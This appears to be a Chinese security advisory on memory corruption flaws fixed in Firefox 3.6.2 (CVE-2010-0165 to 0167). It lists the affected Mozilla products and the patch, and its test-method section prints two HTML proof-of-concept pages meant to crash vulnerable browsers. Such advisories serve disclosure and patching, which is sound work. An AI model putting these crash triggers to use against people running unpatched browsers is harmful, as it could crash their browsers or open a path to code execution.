安全研究

安全漏洞
Firefox 3.6.2更新修复多个内存破坏漏洞

发布日期:2010-03-24
更新日期:2010-03-25

受影响系统:
Mozilla Firefox 3.5.x
Mozilla Firefox 3.0.x
Mozilla Thunderbird 3.0
Mozilla SeaMonkey 2.0
不受影响系统:
Mozilla Firefox 3.6.2
Mozilla Firefox 3.5.8
Mozilla Firefox 3.0.18
Mozilla Thunderbird 3.0.2
Mozilla SeaMonkey 2.0.3
描述:
BUGTRAQ  ID: 38939,38943,38944
CVE(CAN) ID: CVE-2010-0165,CVE-2010-0166,CVE-2010-0167

Firefox是一款流行的开源WEB浏览器。

Firefox浏览器引擎的TraceRecorder::traverseScopeChain()、gfxTextRun::SanitizeGlyphRuns()等函数在处理超长输入参数时存在多个内存破坏漏洞,用户受骗访问了恶意网页就会导致浏览器崩溃或执行任意代码。

<*来源:Jesse Ruderman (jruderman@gmail.com
        Bob Clary
  
  链接:http://secunia.com/advisories/38608/
        http://www.mozilla.org/security/announce/2010/mfsa2010-11.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<!DOCTYPE html>
<html>
<head></head>
<body style="font-family: monospace; width: 0;">
<div style="-moz-column-count: 4;"><div>a b c d<span style="display: list-item;"></span></div></div>
</body>
</html>

<html>
<head>
<title>Testcase for bug 538065</title>
<style type="text/css">
span.test { background: #ff0; }
</style>
</head>
<body>
<p>U+FEFF: <span class="test">&#xfeff;</span></p>
<p>U+FFF9: <span class="test">&#xfff9;</span></p>
<p>U+FFFA: <span class="test">&#xfffa;</span></p>
<p>U+FFFB: <span class="test">&#xfffb;</span></p>
</body>
</html>

建议:
厂商补丁:

Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.mozilla.org/

浏览次数:2643
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障